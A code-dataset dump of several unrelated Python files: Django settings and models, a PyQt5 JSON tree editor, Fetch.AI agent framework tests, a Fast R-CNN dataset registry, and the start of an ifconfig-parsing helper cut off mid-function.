'/static/'\n\nPOSTGIS_TEMPLATE = ge.env('POSTGIS_TEMPLATE', 'template_postgis')\nPOSTGIS_VERSION = (1, 5, 3)\n\nREST_FRAMEWORK = {\n 'PAGINATE_BY:': 10\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': 'debug.log',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n },\n}\n","sub_path":"grubbing/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"237645435","text":"import json\r\nimport sys\r\nfrom mainwindow import Ui_MainWindow\r\nfrom settings import Ui_Dialog\r\nfrom treeview import Model, Delegate, Item\r\nfrom PyQt5 import QtWidgets, QtCore\r\n\r\nclass Settings(QtWidgets.QDialog):\r\n def __init__(self, parent, columns):\r\n super().__init__(parent)\r\n \r\n self.ui = Ui_Dialog()\r\n self.ui.setupUi(self)\r\n self.model = Model(self)\r\n self.model.insertColumns(0, ['column'])\r\n self.ui.listView.setModel(self.model)\r\n self.ui.listView.setItemDelegate(Delegate())\r\n self.ui.listView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.ui.listView.customContextMenuRequested.connect(self.contextMenu)\r\n\r\n for column in columns:\r\n self.model.insertRows(self.model.root_item.childCount(), 1)\r\n child_item = self.model.root_item.child(-1)\r\n child_item.set_data('column', column)\r\n\r\n def add_item(self):\r\n self.model.insertRows(self.model.root_item.childCount(), 1)\r\n\r\n def columns(self):\r\n result = self.exec()\r\n data = self.model.data\r\n index = self.model.index\r\n columns = [ data(index(r, 0, QtCore.QModelIndex())) for r in range(self.model.rowCount()) ]\r\n return (columns, result == QtWidgets.QDialog.Accepted)\r\n \r\n def contextMenu(self, point):\r\n self.menu = QtWidgets.QMenu(self)\r\n self.menu.addAction('Add', self.add_item)\r\n self.menu.addAction('Delete', self.delete_item)\r\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\r\n \r\n def delete_item(self):\r\n indexes = self.ui.listView.selectedIndexes()\r\n for index in indexes:\r\n self.model.removeItem(index)\r\n\r\nclass MainWindow(QtWidgets.QMainWindow):\r\n def __init__(self, app):\r\n super().__init__()\r\n \r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n\r\n self.model = Model(self)\r\n\r\n self.ui.treeView.setModel(self.model)\r\n self.ui.treeView.setItemDelegate(Delegate())\r\n self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.ui.treeView.customContextMenuRequested.connect(self.contextMenu)\r\n\r\n self.ui.actionAddChild.triggered.connect(self.add_child)\r\n self.ui.actionDelete.triggered.connect(self.delete_item)\r\n self.ui.actionOpen.triggered.connect(self.open_json)\r\n self.ui.actionSave.triggered.connect(self.save_json)\r\n self.ui.actionSettings.triggered.connect(self.show_settings_dialog)\r\n\r\n def show_settings_dialog(self):\r\n columns, result = Settings(self, self.model.columns()).columns()\r\n if not result:\r\n return\r\n self.model.removeColumns(0, self.model.columnCount())\r\n self.model.insertColumns(0, columns)\r\n\r\n def open_json(self, filename):\r\n\r\n def recursion(_part, _parent_index, _parts):\r\n _dict = { key:_part[key] for key in _part if not 'parts' == key }\r\n parent_item = _parent_index.internalPointer()\r\n if parent_item is None:\r\n parent_item = self.model.root_item\r\n self.model.insertRows(parent_item.childCount(), 1, _parent_index)\r\n child_item = parent_item.child(-1)\r\n child_item.set_dict(_dict)\r\n if 'parts' in _part:\r\n index = self.model.createIndex(parent_item.childCount(), 0, child_item)\r\n children = _part['parts']\r\n for child in children:\r\n recursion(child, index, parts)\r\n \r\n filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Save file', '', 'JSON File (*.json)')\r\n if not filename[0]:\r\n return\r\n \r\n json_data = json.load( open(filename[0]) )\r\n self.model.removeColumns(0, self.model.columnCount())\r\n self.model.removeRows(0, self.model.root_item.childCount())\r\n self.model.insertColumns(0, json_data['columns'])\r\n\r\n parts = json_data['parts']\r\n for part in parts:\r\n recursion(part, QtCore.QModelIndex(), parts)\r\n \r\n def save_json(self):\r\n\r\n def recursion(parent):\r\n _dict1 = parent.dict\r\n if parent.childCount()==0:\r\n _dict1['parts'] = [ recursion(child) for child in parent.children() ]\r\n return _dict1\r\n \r\n parts = []\r\n for child in self.model.root_item.children():\r\n parts.append( recursion(child) )\r\n \r\n parts = {'columns':self.model.columns, 'parts':parts}\r\n\r\n filename = QtWidgets.QFileDialog.getSaveFileName(self, 'Save file', '', 'JSON File (*.json)')\r\n if filename[0]:\r\n json.dump(parts, open(filename[0],'w'), indent=4)\r\n\r\n def contextMenu(self, point):\r\n self.menu = QtWidgets.QMenu(self)\r\n self.menu.addAction('Add child', self.add_child)\r\n self.menu.addAction('Delete', self.delete_item)\r\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\r\n \r\n def add_child(self):\r\n indexes = self.ui.treeView.selectedIndexes()\r\n \r\n if len(indexes) == 0:\r\n self.model.insertRows(self.model.root_item.childCount(), 1, QtCore.QModelIndex())\r\n return\r\n \r\n indexes2 = []\r\n for index in indexes:\r\n if not index.row() in [ i.row() for i in indexes2 if i.parent() == index.parent() ]:\r\n indexes2.append(index)\r\n \r\n for index in indexes2:\r\n item = index.internalPointer()\r\n self.model.insertRows(item.childCount() + 1, 1, index)\r\n\r\n def delete_item(self):\r\n indexes = self.ui.treeView.selectedIndexes()\r\n\r\n if len(indexes) == 0:\r\n return\r\n\r\n indexes2 = []\r\n for index in indexes:\r\n if not index.row() in [ i.row() for i in indexes2 if i.parent() == index.parent() ]:\r\n indexes2.append(index)\r\n \r\n for index in indexes2:\r\n self.model.removeRows(index.row(), 1, index.parent())\r\n\r\ndef main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MainWindow(app)\r\n window.show()\r\n app.exec_()\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"380382263","text":"from django.db import models\n\n\nclass Section(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование раздела')\n slug = models.SlugField(max_length=128, unique=True)\n\n class Meta:\n verbose_name = 'Раздел'\n verbose_name_plural = 'Разделы'\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование категории')\n section = models.ForeignKey(\n Section,\n related_name='categories', on_delete=models.PROTECT, verbose_name='Раздел'\n )\n slug = models.SlugField(max_length=128, unique=True)\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def __str__(self):\n return self.name\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование')\n category = models.ForeignKey(\n Category,\n related_name='products', on_delete=models.PROTECT, verbose_name='Категория'\n )\n slug = models.SlugField(max_length=128, unique=True)\n image = models.ImageField(upload_to='img/products/', blank=True, verbose_name='Изображение')\n description = models.CharField(max_length=256, verbose_name='Описание')\n\n class Meta:\n verbose_name = 'Товар'\n verbose_name_plural = 'Товары'\n\n def __str__(self):\n return self.name\n\n\nclass Review(models.Model):\n product = models.ForeignKey(\n Product,\n related_name='reviews', on_delete=models.PROTECT, verbose_name='Товар'\n )\n name = models.CharField(max_length=128, verbose_name='Имя')\n content = models.TextField(verbose_name='Отзыв', default=False)\n rating = models.PositiveSmallIntegerField(verbose_name='Рейтинг')\n created = models.DateTimeField(auto_now_add=True, verbose_name='Дата и время создания')\n\n class Meta:\n verbose_name = 'Отзыв'\n verbose_name_plural = 'Отзывы'\n\n def __str__(self):\n return f'{self.name} {self.content[:30]}'\n","sub_path":"Diplom_django/products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"172635861","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\"\"\"This module contains the tests for aea/aea.py.\"\"\"\n\nimport os\nimport tempfile\nimport time\nfrom pathlib import Path\nfrom threading import Thread\n\nimport pytest\n\nimport yaml\n\nfrom aea import AEA_DIR\nfrom aea.aea import AEA\nfrom aea.configurations.base import ProtocolConfig, PublicId\nfrom aea.connections.stub.connection import StubConnection\nfrom aea.crypto.fetchai import FETCHAI\nfrom aea.crypto.ledger_apis import LedgerApis\nfrom aea.crypto.wallet import Wallet\nfrom aea.identity.base import Identity\nfrom aea.mail.base import Envelope\nfrom aea.protocols.base import Protocol\nfrom aea.protocols.default.message import DefaultMessage\nfrom aea.protocols.default.serialization import DefaultSerializer\nfrom aea.registries.base import Resources\nfrom aea.skills.base import Skill\n\nfrom packages.fetchai.connections.local.connection import LocalNode, OEFLocalConnection\nfrom packages.fetchai.protocols.fipa.message import FIPAMessage\nfrom packages.fetchai.protocols.fipa.serialization import FIPASerializer\n\nfrom .conftest import (\n CUR_PATH,\n DUMMY_SKILL_PUBLIC_ID,\n LOCAL_CONNECTION_PUBLIC_ID,\n UNKNOWN_PROTOCOL_PUBLIC_ID,\n)\nfrom .data.dummy_aea.skills.dummy.tasks import DummyTask # type: ignore\nfrom .data.dummy_skill.behaviours import DummyBehaviour # type: ignore\n\n\ndef test_initialise_aea():\n \"\"\"Tests the initialisation of the AEA.\"\"\"\n node = LocalNode()\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(\"my_name\", address=wallet.addresses[FETCHAI])\n connections1 = [\n OEFLocalConnection(\n identity.address, node, connection_id=OEFLocalConnection.connection_id\n )\n ]\n ledger_apis = LedgerApis({}, FETCHAI)\n my_AEA = AEA(\n identity,\n connections1,\n wallet,\n ledger_apis,\n resources=Resources(str(Path(CUR_PATH, \"aea\"))),\n )\n assert my_AEA.context == my_AEA._context, \"Cannot access the Agent's Context\"\n assert (\n not my_AEA.context.connection_status.is_connected\n ), \"AEA should not be connected.\"\n my_AEA.setup()\n assert my_AEA.resources is not None, \"Resources must not be None after setup\"\n my_AEA.resources = Resources(str(Path(CUR_PATH, \"aea\")))\n assert my_AEA.resources is not None, \"Resources must not be None after set\"\n assert (\n my_AEA.context.shared_state is not None\n ), \"Shared state must not be None after set\"\n assert my_AEA.context.task_manager is not None\n assert my_AEA.context.identity is not None, \"Identity must not be None after set.\"\n my_AEA.stop()\n\n\ndef test_act():\n \"\"\"Tests the act function of the AEA.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n ledger_apis = LedgerApis({}, FETCHAI)\n connections = [\n OEFLocalConnection(\n identity.address, node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n ]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(1.0)\n\n behaviour = agent.resources.behaviour_registry.fetch(\n (DUMMY_SKILL_PUBLIC_ID, \"dummy\")\n )\n assert behaviour.nb_act_called > 0, \"Act() wasn't called\"\n finally:\n agent.stop()\n t.join()\n\n\ndef test_react():\n \"\"\"Tests income messages.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n ledger_apis = LedgerApis({}, FETCHAI)\n connection = OEFLocalConnection(\n identity.address, node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n connections = [connection]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n msg.counterparty = identity.address\n message_bytes = DefaultSerializer().encode(msg)\n\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=DefaultMessage.protocol_id,\n message=message_bytes,\n )\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(1.0)\n agent.outbox.put(envelope)\n time.sleep(2.0)\n default_protocol_public_id = DefaultMessage.protocol_id\n dummy_skill_public_id = DUMMY_SKILL_PUBLIC_ID\n handler = agent.resources.handler_registry.fetch_by_protocol_and_skill(\n default_protocol_public_id, dummy_skill_public_id\n )\n assert handler is not None, \"Handler is not set.\"\n assert (\n msg in handler.handled_messages\n ), \"The message is not inside the handled_messages.\"\n except Exception:\n raise\n finally:\n agent.stop()\n t.join()\n\n\n@pytest.mark.asyncio\nasync def test_handle():\n \"\"\"Tests handle method of an agent.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n ledger_apis = LedgerApis({}, FETCHAI)\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n connection = OEFLocalConnection(\n identity.address, node, connection_id=DUMMY_SKILL_PUBLIC_ID\n )\n connections = [connection]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n msg.counterparty = agent_name\n message_bytes = DefaultSerializer().encode(msg)\n\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=UNKNOWN_PROTOCOL_PUBLIC_ID,\n message=message_bytes,\n )\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(2.0)\n dummy_skill = agent.resources.get_skill(DUMMY_SKILL_PUBLIC_ID)\n dummy_handler = dummy_skill.handlers[\"dummy\"]\n\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 1\n\n # DECODING ERROR\n msg = \"hello\".encode(\"utf-8\")\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=DefaultMessage.protocol_id,\n message=msg,\n )\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 2\n\n # UNSUPPORTED SKILL\n msg = FIPASerializer().encode(\n FIPAMessage(\n performative=FIPAMessage.Performative.ACCEPT,\n message_id=0,\n dialogue_reference=(str(0), \"\"),\n target=1,\n )\n )\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=FIPAMessage.protocol_id,\n message=msg,\n )\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 3\n\n finally:\n agent.stop()\n t.join()\n\n\nclass TestInitializeAEAProgrammaticallyFromResourcesDir:\n \"\"\"Test that we can initialize the agent by providing the resource object loaded from dir.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.node = LocalNode()\n cls.node.start()\n cls.agent_name = \"MyAgent\"\n cls.private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n cls.wallet = Wallet({FETCHAI: cls.private_key_path})\n cls.ledger_apis = LedgerApis({}, FETCHAI)\n cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])\n cls.connection = OEFLocalConnection(\n cls.agent_name, cls.node, connection_id=LOCAL_CONNECTION_PUBLIC_ID,\n )\n cls.connections = [cls.connection]\n\n cls.resources = Resources(os.path.join(CUR_PATH, \"data\", \"dummy_aea\"))\n cls.aea = AEA(\n cls.identity,\n cls.connections,\n cls.wallet,\n cls.ledger_apis,\n cls.resources,\n is_programmatic=False,\n )\n\n cls.expected_message = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n cls.expected_message.counterparty = cls.agent_name\n envelope = Envelope(\n to=cls.agent_name,\n sender=cls.agent_name,\n protocol_id=DefaultMessage.protocol_id,\n message=DefaultSerializer().encode(cls.expected_message),\n )\n\n cls.t = Thread(target=cls.aea.start)\n cls.t.start()\n\n time.sleep(0.5)\n cls.aea.outbox.put(envelope)\n time.sleep(0.5)\n\n def test_initialize_aea_programmatically(self):\n \"\"\"Test that we can initialize an AEA programmatically.\"\"\"\n dummy_skill_id = DUMMY_SKILL_PUBLIC_ID\n dummy_behaviour_name = \"dummy\"\n dummy_behaviour = self.aea.resources.behaviour_registry.fetch(\n (dummy_skill_id, dummy_behaviour_name)\n )\n assert dummy_behaviour is not None\n assert dummy_behaviour.nb_act_called > 0\n\n # TODO the previous code caused an error:\n # _pickle.PicklingError: Can't pickle : import of module 'tasks' failed\n dummy_task = DummyTask()\n task_id = self.aea.task_manager.enqueue_task(dummy_task)\n async_result = self.aea.task_manager.get_task_result(task_id)\n expected_dummy_task = async_result.get(2.0)\n assert expected_dummy_task.nb_execute_called > 0\n\n dummy_handler = self.aea.resources.handler_registry.fetch_by_protocol_and_skill(\n DefaultMessage.protocol_id, dummy_skill_id\n )\n dummy_handler_alt = self.aea.resources.handler_registry.fetch(\n (dummy_skill_id, \"dummy\")\n )\n assert dummy_handler == dummy_handler_alt\n assert dummy_handler is not None\n assert len(dummy_handler.handled_messages) == 1\n assert dummy_handler.handled_messages[0] == self.expected_message\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n cls.aea.stop()\n cls.t.join()\n cls.node.stop()\n\n\nclass TestInitializeAEAProgrammaticallyBuildResources:\n \"\"\"Test that we can initialize the agent by building the resource object.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.node = LocalNode()\n cls.node.start()\n cls.agent_name = \"MyAgent\"\n cls.private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n cls.wallet = Wallet({FETCHAI: cls.private_key_path})\n cls.ledger_apis = LedgerApis({}, FETCHAI)\n cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])\n cls.connection = OEFLocalConnection(\n cls.agent_name, cls.node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n cls.connections = [cls.connection]\n\n cls.temp = tempfile.mkdtemp(prefix=\"test_aea_resources\")\n cls.resources = Resources(cls.temp)\n cls.aea = AEA(\n cls.identity,\n cls.connections,\n cls.wallet,\n cls.ledger_apis,\n resources=cls.resources,\n )\n\n default_protocol_id = DefaultMessage.protocol_id\n\n cls.default_protocol_configuration = ProtocolConfig.from_json(\n yaml.safe_load(open(Path(AEA_DIR, \"protocols\", \"default\", \"protocol.yaml\")))\n )\n cls.default_protocol = Protocol(\n default_protocol_id, DefaultSerializer(), cls.default_protocol_configuration\n )\n cls.resources.protocol_registry.register(\n default_protocol_id, cls.default_protocol\n )\n\n cls.error_skill = Skill.from_dir(\n Path(AEA_DIR, \"skills\", \"error\"), cls.aea.context\n )\n cls.dummy_skill = Skill.from_dir(\n Path(CUR_PATH, \"data\", \"dummy_skill\"), cls.aea.context\n )\n cls.resources.add_skill(cls.dummy_skill)\n cls.resources.add_skill(cls.error_skill)\n\n cls.expected_message = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n cls.expected_message.counterparty = cls.agent_name\n\n cls.t = Thread(target=cls.aea.start)\n cls.t.start()\n time.sleep(0.5)\n\n cls.aea.outbox.put(\n Envelope(\n to=cls.agent_name,\n sender=cls.agent_name,\n protocol_id=default_protocol_id,\n message=DefaultSerializer().encode(cls.expected_message),\n )\n )\n\n def test_initialize_aea_programmatically(self):\n \"\"\"Test that we can initialize an AEA programmatically.\"\"\"\n time.sleep(0.5)\n\n dummy_skill_id = DUMMY_SKILL_PUBLIC_ID\n dummy_behaviour_name = \"dummy\"\n dummy_behaviour = self.aea.resources.behaviour_registry.fetch(\n (dummy_skill_id, dummy_behaviour_name)\n )\n assert dummy_behaviour is not None\n assert dummy_behaviour.nb_act_called > 0\n\n dummy_task = DummyTask()\n task_id = self.aea.task_manager.enqueue_task(dummy_task)\n async_result = self.aea.task_manager.get_task_result(task_id)\n expected_dummy_task = async_result.get(2.0)\n assert expected_dummy_task.nb_execute_called > 0\n\n dummy_handler_name = \"dummy\"\n dummy_handler = self.aea.resources.handler_registry.fetch(\n (dummy_skill_id, dummy_handler_name)\n )\n dummy_handler_alt = self.aea.resources.handler_registry.fetch_by_protocol_and_skill(\n DefaultMessage.protocol_id, dummy_skill_id\n )\n assert dummy_handler == dummy_handler_alt\n assert dummy_handler is not None\n assert len(dummy_handler.handled_messages) == 1\n assert dummy_handler.handled_messages[0] == self.expected_message\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n cls.aea.stop()\n cls.t.join()\n cls.node.stop()\n Path(cls.temp).rmdir()\n\n\nclass TestAddBehaviourDynamically:\n \"\"\"Test that we can add a behaviour dynamically.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n ledger_apis = LedgerApis({}, FETCHAI)\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n cls.input_file = tempfile.mkstemp()[1]\n cls.output_file = tempfile.mkstemp()[1]\n cls.agent = AEA(\n identity,\n [StubConnection(cls.input_file, cls.output_file)],\n wallet,\n ledger_apis,\n resources,\n is_programmatic=False,\n )\n\n cls.t = Thread(target=cls.agent.start)\n cls.t.start()\n time.sleep(1.0)\n\n def test_add_behaviour_dynamically(self):\n \"\"\"Test the dynamic registration of a behaviour.\"\"\"\n dummy_skill_id = PublicId(\"dummy_author\", \"dummy\", \"0.1.0\")\n dummy_skill = self.agent.resources.get_skill(dummy_skill_id)\n assert dummy_skill is not None\n new_behaviour = DummyBehaviour(\n name=\"dummy2\", skill_context=dummy_skill.skill_context\n )\n dummy_skill.skill_context.new_behaviours.put(new_behaviour)\n time.sleep(1.0)\n assert new_behaviour.nb_act_called > 0\n assert (\n len(self.agent.resources.behaviour_registry.fetch_by_skill(dummy_skill_id))\n == 2\n )\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the class down.\"\"\"\n cls.agent.stop()\n cls.t.join()\n Path(cls.input_file).unlink()\n Path(cls.output_file).unlink()\n","sub_path":"tests/test_aea.py","file_name":"test_aea.py","file_ext":"py","file_size_in_byte":18486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"515654467","text":"# --------------------------------------------------------\n# Fast R-CNN\n# Copyright (c) 2015 Microsoft\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Ross Girshick\n# --------------------------------------------------------\n\n\"\"\"Factory method for easily getting imdbs by name.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datasets.pascal_voc import pascal_voc\nfrom datasets.coco import coco\nfrom datasets.imagenet import imagenet\nfrom datasets.vg import vg\nfrom datasets.food import food\nfrom datasets.food_data import food_merge_imdb\nfrom datasets.school_lunch import school_lunch\nfrom datasets.food_meta_data import food_meta_imdb\n\n__sets = {}\n\nfor canteen in [\"Arts\"]:\n for split in ['train', 'test']:\n name = 'food_meta_{}_{}'.format(canteen, split)\n categories = \"{}_trainval\".format(canteen)\n __sets[name] = (lambda split=split, canteen=canteen:\n food_meta_imdb(split, canteen, categories))\n\n# Set up food___\nsplits = ['train', 'val', 'trainval', 'inner', 'test']\nmt_splits = []\nfor n in [0, 10, 30, 50, 100]:\n for s in splits:\n mt_splits += [s+\"mt{}\".format(n)]\nsplits += mt_splits\n\ninnersplit = []\nfor sp in ['val', 'test']:\n for m in [10, 30, 50]:\n innersplit.append('innermt{}{}'.format(m, sp))\n\nsplits += innersplit\n\n# take few sample in inner between dataset of canteen and dataset of excl canteen as training data. And regard the lefts as validation.\ninner_few = []\nfor fewN in [0, 1, 3, 5, 10]:\n for mtN in [10]:\n for d in ['train', 'val', 'test']:\n inner_few += [\"innerfew{}mt{}{}\".format(fewN, mtN, d)]\nsplits += inner_few\n\nfor cantee in ['exclYIH', \"All\", \"exclArts\", \"exclUTown\", \"Science\", \"exclScience\", \"exclTechChicken\", \"exclTechMixedVeg\", \"YIH\", \"Arts\", \"TechChicken\", \"TechMixedVeg\", \"UTown\", \"EconomicBeeHoon\"]:\n for split in splits:\n for category in ['exclYIH', \"All\", \"exclArts\", \"exclUTown\", \"Science\", \"exclScience\", \"exclTechChicken\", \"exclTechMixedVeg\", \"YIH\", \"Arts\", \"TechChicken\", \"TechMixedVeg\", \"UTown\", \"EconomicBeeHoon\"]:\n category_train = category + '_train'\n name = 'food_{}_{}_{}'.format(cantee, split, category_train)\n __sets[name] = (lambda split=split,\n cantee=cantee, category_train=category_train: food_merge_imdb(split, cantee, category_train))\n for n in [10, 30, 50, 100]:\n category_mt10 = category + '_train_mt{}'.format(n)\n name = 'food_{}_{}_{}'.format(cantee, split, category_mt10)\n __sets[name] = (lambda split=split,\n cantee=cantee, category_mt10=category_mt10: food_merge_imdb(split, cantee, category_mt10))\n\n#__sets[\"Food_EconomicBeeHoon_train\"] = food_meta_imdb(train, )\n\n# Set up school lunch\nfor split in ['train', 'val', 'trainval', 'test']:\n name = 'schoollunch_{}'.format(split)\n __sets[name] = (lambda split=split: school_lunch(split))\n# Set up voc__\nfor year in ['2007', '2012']:\n for split in ['train', 'val', 'trainval', 'test']:\n name = 'voc_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: pascal_voc(split, year))\n\n# Set up coco_2014_\nfor year in ['2014']:\n for split in ['train', 'val', 'minival', 'valminusminival', 'trainval']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up coco_2014_cap_\nfor year in ['2014']:\n for split in ['train', 'val', 'capval', 'valminuscapval', 'trainval']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up coco_2015_\nfor year in ['2015']:\n for split in ['test', 'test-dev']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up vg_\n# for version in ['1600-400-20']:\n# for split in ['minitrain', 'train', 'minival', 'val', 'test']:\n# name = 'vg_{}_{}'.format(version,split)\n# __sets[name] = (lambda split=split, version=version: vg(version, split))\nfor version in ['150-50-20', '150-50-50', '500-150-80', '750-250-150', '1750-700-450', '1600-400-20']:\n for split in ['minitrain', 'smalltrain', 'train', 'minival', 'smallval', 'val', 'test']:\n name = 'vg_{}_{}'.format(version, split)\n __sets[name] = (lambda split=split,\n version=version: vg(version, split))\n\n# set up image net.\nfor split in ['train', 'val', 'val1', 'val2', 'test']:\n name = 'imagenet_{}'.format(split)\n devkit_path = 'data/imagenet/ILSVRC/devkit'\n data_path = 'data/imagenet/ILSVRC'\n __sets[name] = (lambda split=split, devkit_path=devkit_path,\n data_path=data_path: imagenet(split, devkit_path, data_path))\n\n\ndef get_imdb(name):\n \"\"\"Get an imdb (image database) by name.\"\"\"\n if name not in __sets:\n raise KeyError('Unknown dataset: {}'.format(name))\n return __sets[name]()\n\n\ndef list_imdbs():\n \"\"\"List all registered imdbs.\"\"\"\n return list(__sets.keys())\n","sub_path":"lib/datasets/factory_.py","file_name":"factory_.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"181340078","text":"#encoding=utf-8\nimport re\nimport commands\ndef ifconf_dict():\n\tcomm='ifconfig'\n\tpattern=r\"\"\"([\\w]+: |inet (?:\\d{1,3}\\.){3}\\d{1,3})\"\"\"\n\t#从ifconfig的输出中可以看出网卡都是顶格写后面有一个: ip地址都是inet 开头\n\t#据此写出正则表达式\n\ts=commands.getoutput(comm)\n\t#获取ifconfig的输出\n\tout_put=re.findall(pattern,s)\n\t#正则返回的列表是[网卡,ip,网卡,ip,...]\n\tx={}\n\tfor i,j in zip(out_put[::2],out_put[1::2]):\n\t#切片并合并\n\t\tkey=i[:-2]\n\t\tval=j[5:]\n\t\tx[key]=val\n\treturn 